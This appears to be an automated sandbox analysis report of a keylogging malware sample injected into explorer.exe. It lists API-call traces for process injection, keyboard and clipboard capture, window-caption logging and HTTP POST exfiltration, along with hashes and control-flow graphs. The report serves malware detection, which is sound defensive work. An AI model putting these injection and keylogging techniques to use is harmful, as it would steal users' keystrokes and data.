                                                                                                                                                      • Instruction Fuzzy Hash: 57A002B07D5300BAFD69A7519D5FF152A189B40F02F114244B31A7C5D057E4B650863D
                                                                                                                                                      Function 001B29AE Relevance: 1.3, APIs: 1, Instructions: 5COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 183 1b29ae-1b29bc VirtualFree
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,001B13A4), ref: 001B29B6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                                      • Opcode ID: a6e4d6aed7b5dfe9d05a431c88259958110bd0a58d47975a2de064d4e7ebadeb
                                                                                                                                                      • Instruction ID: e0d64d035bcacc2639a266cc64a38496a29eef2c10686ba94f365eb618f691fe
                                                                                                                                                      • Opcode Fuzzy Hash: a6e4d6aed7b5dfe9d05a431c88259958110bd0a58d47975a2de064d4e7ebadeb
                                                                                                                                                      • Instruction Fuzzy Hash: F2A0027079470076ED7467245D0EF0966546B40B02F2046447655A84D04AA5B1988A18

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 001B18BF Relevance: 47.5, APIs: 23, Strings: 4, Instructions: 208injectionnativesleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001B2724: VirtualQuery.KERNEL32(00000000,?,0000001C,?,?,?,00000000,001B29F3,-00000001,001B128C), ref: 001B2731
                                                                                                                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000000,00000001), ref: 001B18F4
                                                                                                                                                      • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 001B192F
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001B19BF
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,001B3638,00000016), ref: 001B19E6
                                                                                                                                                      • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 001B1A0E
                                                                                                                                                      • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 001B1A1E
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001B1A38
                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 001B1A40
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1A4E
                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1A55
                                                                                                                                                      • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 001B1A6B
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001B1A72
                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001B1A88
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001B1AB2
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001B1AC5
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1ACC
                                                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1AD3
                                                                                                                                                      • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 001B1AE7
                                                                                                                                                      • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001B1AFE
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1B0B
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1B11
                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 001B1B17
                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000), ref: 001B1B1A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                      • String ID: 0-vwP,vw$atan$ntdll$opera_shared_counter
                                                                                                                                                      • API String ID: 1066286714-1470420532
                                                                                                                                                      • Opcode ID: e08400d977b4ee06100005277c79b01939eb7e84864b264f5cf8b148e8346475
                                                                                                                                                      • Instruction ID: 0b09357e0e233db474fa8d29de869958a79d54a591906dc51a662134c400a528
                                                                                                                                                      • Opcode Fuzzy Hash: e08400d977b4ee06100005277c79b01939eb7e84864b264f5cf8b148e8346475
                                                                                                                                                      • Instruction Fuzzy Hash: 7F617871204305BFD310EF259D88EABBBECEF89754F410619F959D3291DB70EA448BA2
                                                                                                                                                      Function 001B2799 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 68encryptionstringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 001B27B5
                                                                                                                                                      • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 001B27CD
                                                                                                                                                      • lstrlen.KERNEL32(?,00000000), ref: 001B27D5
                                                                                                                                                      • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 001B27E0
                                                                                                                                                      • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 001B27FA
                                                                                                                                                      • wsprintfA.USER32 ref: 001B2811
                                                                                                                                                      • CryptDestroyHash.ADVAPI32(?), ref: 001B282A
                                                                                                                                                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 001B2834
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                      • String ID: %02X
                                                                                                                                                      • API String ID: 3341110664-436463671
                                                                                                                                                      • Opcode ID: 8ec1026064a3bbf36144c5778a1122788f472ffc0a059aadf0656c22199949f0
                                                                                                                                                      • Instruction ID: ff65a9618786269a9074db1a99bb37f631d9773fe79c207d6c61630b8a9c3f1e
                                                                                                                                                      • Opcode Fuzzy Hash: 8ec1026064a3bbf36144c5778a1122788f472ffc0a059aadf0656c22199949f0
                                                                                                                                                      • Instruction Fuzzy Hash: 9411197190010CBFDB11AB99EC89EEEBBBCEB48311F104165F615E2160D7715FA59B60
                                                                                                                                                      Function 001B162B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 001B1652
                                                                                                                                                      • ToUnicode.USER32(0000001B,?,?,?,00000009,00000000), ref: 001B167A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: KeyboardStateUnicode
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3453085656-3916222277
                                                                                                                                                      • Opcode ID: 70131ea5277be05c8172497d68c9035af989a161d0982f79ac59be6cff5ffac2
                                                                                                                                                      • Instruction ID: a523f1134b4509d0c920cd39eec7750563757f98ada329e9ece3674ac553def5
                                                                                                                                                      • Opcode Fuzzy Hash: 70131ea5277be05c8172497d68c9035af989a161d0982f79ac59be6cff5ffac2
                                                                                                                                                      • Instruction Fuzzy Hash: 3301D233910209BBDB34CB16DD65BFB73BCAF05B00F89411AE901E2040D7B0EA818AA1
                                                                                                                                                      Function 001B13AE Relevance: 38.6, APIs: 17, Strings: 5, Instructions: 144libraryloaderthreadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • RtlZeroMemory.NTDLL(001B5013,0000001C), ref: 001B13C8
                                                                                                                                                      • VirtualQuery.KERNEL32(001B13AE,?,0000001C), ref: 001B13DA
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 001B140B
                                                                                                                                                      • GetCurrentProcessId.KERNEL32(00000004), ref: 001B141C
                                                                                                                                                      • wsprintfA.USER32 ref: 001B1433
                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 001B1448
                                                                                                                                                      • GetLastError.KERNEL32 ref: 001B144E
                                                                                                                                                      • RtlInitializeCriticalSection.NTDLL(001B582C), ref: 001B1465
                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 001B1489
                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,TranslateMessage), ref: 001B14A6
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001B14AF
                                                                                                                                                      • GetModuleHandleA.KERNEL32(user32.dll,GetClipboardData), ref: 001B14D0
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 001B14D3
                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 001B14F1
                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_0000082D,00000000,00000000,00000000), ref: 001B150D
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001B1514
                                                                                                                                                      • RtlExitUserThread.NTDLL(00000000), ref: 001B152A
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule$AddressCreateProcThread$CloseCriticalCurrentErrorExitFileInitializeLastMemoryMutexNameProcessQuerySectionSleepUserVirtualZerowsprintf
                                                                                                                                                      • String ID: %s%d%d%d$GetClipboardData$TranslateMessage$kernel32.dll$user32.dll
                                                                                                                                                      • API String ID: 3628807430-1779906909
                                                                                                                                                      • Opcode ID: ad45656a685a006bacbaf1c16a38a2453362aae604878bd4f432d7f602c71d25
                                                                                                                                                      • Instruction ID: 9365672132f7c97f08394184b65abd92334ca9ba3186b4b15517cd428df2cd4b
                                                                                                                                                      • Opcode Fuzzy Hash: ad45656a685a006bacbaf1c16a38a2453362aae604878bd4f432d7f602c71d25
                                                                                                                                                      • Instruction Fuzzy Hash: 1841E170600308FBD720BF66EC59EDB3BADEF98750B414118F50687691DB75D9548BA0
                                                                                                                                                      Function 001B16B9 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 90stringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • RtlEnterCriticalSection.NTDLL(001B582C), ref: 001B16C4
                                                                                                                                                      • lstrlenW.KERNEL32 ref: 001B16DB
                                                                                                                                                      • lstrlenW.KERNEL32 ref: 001B16F3
                                                                                                                                                      • wsprintfW.USER32 ref: 001B1743
                                                                                                                                                      • GetForegroundWindow.USER32 ref: 001B174E
                                                                                                                                                      • GetWindowTextW.USER32(00000000,001B5850,00000800), ref: 001B1767
                                                                                                                                                      • GetClassNameW.USER32(00000000,001B5850,00000800), ref: 001B1774
                                                                                                                                                      • lstrcmpW.KERNEL32(001B5020,001B5850), ref: 001B1781
                                                                                                                                                      • lstrcpyW.KERNEL32(001B5020,001B5850), ref: 001B178D
                                                                                                                                                      • wsprintfW.USER32 ref: 001B17AD
                                                                                                                                                      • lstrcatW.KERNEL32 ref: 001B17C6
                                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(001B582C), ref: 001B17D3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSectionWindowlstrlenwsprintf$ClassEnterForegroundLeaveNameTextlstrcatlstrcmplstrcpy
                                                                                                                                                      • String ID: Clipboard -> $ New Window Caption -> $%s%s%s$%s%s%s%s
                                                                                                                                                      • API String ID: 2651329914-3371406555
                                                                                                                                                      • Opcode ID: 1caa24c791a55a795b093721a0aef525af59191dc5cb32cf6d90a4596c9fcb07
                                                                                                                                                      • Instruction ID: 5ad633680eaaca5ee3d724e624a991d8db146f31d00cf68afc78dd84f905715c
                                                                                                                                                      • Opcode Fuzzy Hash: 1caa24c791a55a795b093721a0aef525af59191dc5cb32cf6d90a4596c9fcb07
                                                                                                                                                      • Instruction Fuzzy Hash: 4921B230600614BBD3213B2BEC99BEF3BAEEB41B557464224F41593961DF229E6186B1
                                                                                                                                                      Function 001B25F1 Relevance: 15.1, APIs: 10, Instructions: 51threadprocessinjectionCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 001B2603
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 001B260B
                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 001B261B
                                                                                                                                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 001B2629
                                                                                                                                                      • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 001B2648
                                                                                                                                                      • SuspendThread.KERNEL32(00000000), ref: 001B2658
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001B2667
                                                                                                                                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 001B2677
                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 001B2682
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1467098526-0
                                                                                                                                                      • Opcode ID: a3c609055246226e93954e3429d155ae74567e6e378a7bad3a7a028e19cc336d
                                                                                                                                                      • Instruction ID: 22ab3fd1b08cb4947e4b52a0c419d7d4402722f72d15b7ab9c074b6662d08d3b
                                                                                                                                                      • Opcode Fuzzy Hash: a3c609055246226e93954e3429d155ae74567e6e378a7bad3a7a028e19cc336d
                                                                                                                                                      • Instruction Fuzzy Hash: F611A131409200EFD711AF60EC4CAAFBFB4FF85701F000629FE5592550D7308AA98BA3
                                                                                                                                                      Function 001B20A1 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 296 1b20a1-1b20fc call 1b240f call 1b2a09 call 1b298a call 1b24cc 305 1b20fe-1b2115 296->305 306 1b2117-1b2123 296->306 309 1b2127-1b2129 305->309 306->309 310 1b212f-1b2166 RtlZeroMemory 309->310 311 1b23fd-1b240c call 1b29eb 309->311 315 1b216c-1b2187 310->315 316 1b23f5-1b23fc 310->316 317 1b21b9-1b21cb 315->317 318 1b2189-1b219a call 1b243d 315->318 316->311 325 1b21cf-1b21d1 317->325 323 1b21ad 318->323 324 1b219c-1b21ab 318->324 326 1b21af-1b21b7 323->326 324->326 327 1b23e2-1b23e8 325->327 328 1b21d7-1b2233 call 1b288d 325->328 326->325 330 1b23ea-1b23ec call 1b29eb 327->330 331 1b23f1 327->331 336 1b23db 328->336 337 1b2239-1b223e 328->337 330->331 331->316 336->327 338 1b2258-1b2286 call 1b2a09 wsprintfW 337->338 339 1b2240-1b2251 337->339 342 1b2288-1b228a 338->342 343 1b229f-1b22b6 338->343 339->338 344 1b228b-1b228e 342->344 348 1b22b8-1b22ee call 1b2a09 wsprintfW 343->348 349 1b22f5-1b230f 343->349 345 1b2299-1b229b 344->345 346 1b2290-1b2295 344->346 345->343 346->344 350 1b2297 346->350 348->349 354 1b23b8-1b23ce call 1b29eb 349->354 355 1b2315-1b2328 349->355 350->343 362 1b23d0-1b23d2 call 1b29eb 354->362 363 1b23d7 354->363 355->354 359 1b232e-1b2344 call 1b2a09 355->359 366 1b2346-1b2351 359->366 362->363 363->336 367 1b2353-1b2360 call 1b29ce 366->367 368 1b2365-1b237c 366->368 367->368 372 1b237e 368->372 373 1b2380-1b238d 368->373 372->373 373->366 374 1b238f-1b2393 373->374 375 1b23ad-1b23b4 call 1b29eb 374->375 376 1b2395-1b23a7 call 1b29bd RtlMoveMemory 374->376 375->354 376->375
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
                                                                                                                                                        • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
                                                                                                                                                        • Part of subcall function 001B298A: lstrlen.KERNEL32(001B4FE2,?,00000000,00000000,001B20DD,771A8A60,001B4FE2,00000000), ref: 001B2992
                                                                                                                                                        • Part of subcall function 001B298A: MultiByteToWideChar.KERNEL32(00000000,00000000,001B4FE2,00000001,00000000,00000000), ref: 001B29A4
                                                                                                                                                        • Part of subcall function 001B24CC: RtlZeroMemory.NTDLL(?,00000018), ref: 001B24DE
                                                                                                                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 001B2139
                                                                                                                                                      • wsprintfW.USER32 ref: 001B2272
                                                                                                                                                      • wsprintfW.USER32 ref: 001B22DD
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 001B23A7
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                                                                                                                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                                                                                                                                                      • API String ID: 4204651544-1701262698
                                                                                                                                                      • Opcode ID: 807050d28b37f924cc5b981cbb5bfadcc955108f2836b2e6a05cf249bc15738e
                                                                                                                                                      • Instruction ID: 44ecbe1d9b1fb749507dc89747d9d858f18880eb7e59c98f5d3d405dfe067193
                                                                                                                                                      • Opcode Fuzzy Hash: 807050d28b37f924cc5b981cbb5bfadcc955108f2836b2e6a05cf249bc15738e
                                                                                                                                                      • Instruction Fuzzy Hash: 4FA17B71608341AFD310AF68DC85AABBBE8FF88744F04092DF595D7261DB74DD488B62
                                                                                                                                                      Function 001B12AE Relevance: 7.6, APIs: 5, Instructions: 93stringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 381 1b12ae-1b12bf 382 1b13a6-1b13ad 381->382 383 1b12c5-1b12c7 381->383 383->382 384 1b12cd-1b12fc call 1b29bd lstrlen call 1b2a09 383->384 389 1b136e-1b1377 call 1b29eb 384->389 390 1b12fe-1b1327 call 1b2841 RtlZeroMemory 384->390 395 1b1379-1b137d 389->395 396 1b139d-1b13a5 call 1b29ae 389->396 397 1b1329-1b134f RtlMoveMemory call 1b2569 390->397 398 1b1353-1b1369 RtlMoveMemory call 1b2569 390->398 400 1b137f-1b1392 call 1b255c PathMatchSpecA 395->400 396->382 397->390 406 1b1351 397->406 398->389 408 1b139b 400->408 409 1b1394-1b1397 400->409 406->389 408->396 409->400 410 1b1399 409->410 410->396
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 001B29BD: VirtualAlloc.KERNELBASE(00000000,00040744,00003000,00000040,001B12D9,00000000,00000000,?,00000001), ref: 001B29C7
                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 001B12DC
                                                                                                                                                        • Part of subcall function 001B2A09: GetProcessHeap.KERNEL32(00000008,0000A000,001B10BF), ref: 001B2A0C
                                                                                                                                                        • Part of subcall function 001B2A09: RtlAllocateHeap.NTDLL(00000000), ref: 001B2A13
                                                                                                                                                      • PathMatchSpecA.SHLWAPI(?,00000000), ref: 001B138A
                                                                                                                                                        • Part of subcall function 001B2841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,001B1119,00000001), ref: 001B2850
                                                                                                                                                        • Part of subcall function 001B2841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,001B1119,00000001), ref: 001B2855
                                                                                                                                                      • RtlZeroMemory.NTDLL(00000000,00000104), ref: 001B1316
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 001B1332
                                                                                                                                                        • Part of subcall function 001B2569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,001B136E), ref: 001B2591
                                                                                                                                                        • Part of subcall function 001B2569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 001B259A
                                                                                                                                                      • RtlMoveMemory.NTDLL(00000000,?,?), ref: 001B135F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2993730741-0
                                                                                                                                                      • Opcode ID: 39f3c1e631177243a0590c37c6f34395ec82d604e2d573413411e33750ef8665
                                                                                                                                                      • Instruction ID: 7cb8d947fd800ffa3153e170a3f7bcd0021d5dd30fee076defc9921bda68dbbb
                                                                                                                                                      • Opcode Fuzzy Hash: 39f3c1e631177243a0590c37c6f34395ec82d604e2d573413411e33750ef8665
                                                                                                                                                      • Instruction Fuzzy Hash: 9F21AD70B04201AF8314EF2898659BEB7DABF94710B510A3EF856D3651EB34DD498A62
                                                                                                                                                      Function 001B1581 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 411 1b1581-1b1592 413 1b1598-1b159b 411->413 414 1b1624-1b1628 411->414 415 1b159d-1b15a0 413->415 416 1b15a7-1b15b3 GlobalLock 413->416 415->416 417 1b15a2-1b15a5 415->417 418 1b1623 416->418 419 1b15b5-1b15b9 416->419 417->414 417->416 418->414 420 1b15bb-1b15be 419->420 421 1b15e9 419->421 422 1b15c0-1b15c3 420->422 423 1b15e4-1b15e7 420->423 424 1b15eb-1b15f2 call 1b293e 421->424 425 1b15c5-1b15e2 lstrlenW call 1b2a09 lstrcatW 422->425 426 1b15f4-1b15fd call 1b2724 422->426 423->424 424->426 425->426 433 1b161b-1b1622 GlobalUnlock 426->433 434 1b15ff-1b1608 lstrlenW 426->434 433->418 434->433 435 1b160a-1b160e 434->435 436 1b160f call 1b16b9 435->436 437 1b1614-1b1616 call 1b29eb 436->437 437->433
                                                                                                                                                      APIs
                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 001B15A9
                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 001B15C6
                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000), ref: 001B15DC
                                                                                                                                                      • lstrlenW.KERNEL32(00000000), ref: 001B1600
                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001B161C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1114890469-0
                                                                                                                                                      • Opcode ID: 75b3e28350fd086bac562efd925418767630201d865914c6f2da5cab13c06ec4
                                                                                                                                                      • Instruction ID: 9adaa8232505f6be6ec0431dad7ad1c5e8a8647aab6e8a5befd6d0c08c3237c9
                                                                                                                                                      • Opcode Fuzzy Hash: 75b3e28350fd086bac562efd925418767630201d865914c6f2da5cab13c06ec4
                                                                                                                                                      • Instruction Fuzzy Hash: D601C032A001117B8639777A6CB86FE73AE9FEB71174A412AF80B93612DF748D464290
                                                                                                                                                      Function 001B1BBD Relevance: 6.1, APIs: 4, Instructions: 101libraryloaderCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlMoveMemory.NTDLL(?,?,?), ref: 001B1BF4
                                                                                                                                                      • LoadLibraryA.KERNEL32(?,001B5848,00000000,00000000,771B2EE0,00000000,001B19B6,?,?,?,00000001,?,00000000), ref: 001B1C1C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,-00000002), ref: 001B1C49
                                                                                                                                                      • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 001B1C9A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3827878703-0
                                                                                                                                                      • Opcode ID: aa9c7dd449163c0beb219cab3cdfd66e262b08692f4557973f2b8c43c5bed955
                                                                                                                                                      • Instruction ID: 7196920010d528cad0e55a900977c95194ef96f0eb7e229d4e2140ccdbfd8e8a
                                                                                                                                                      • Opcode Fuzzy Hash: aa9c7dd449163c0beb219cab3cdfd66e262b08692f4557973f2b8c43c5bed955
                                                                                                                                                      • Instruction Fuzzy Hash: C9318F71740616BFCB18CF29C8E4BA6BBA8BF15314F96462CE856C7600D731E855DBA0
                                                                                                                                                      Function 001B182D Relevance: 6.0, APIs: 4, Instructions: 42sleepstringCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      APIs
                                                                                                                                                      • RtlEnterCriticalSection.NTDLL(001B582C), ref: 001B1839
                                                                                                                                                      • lstrlenW.KERNEL32 ref: 001B1845
                                                                                                                                                      • RtlLeaveCriticalSection.NTDLL(001B582C), ref: 001B18A9
                                                                                                                                                      • Sleep.KERNEL32(00007530), ref: 001B18B4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000001A.00000002.2523898588.00000000001B1000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B1000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_26_2_1b1000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSection$EnterLeaveSleeplstrlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2134730579-0
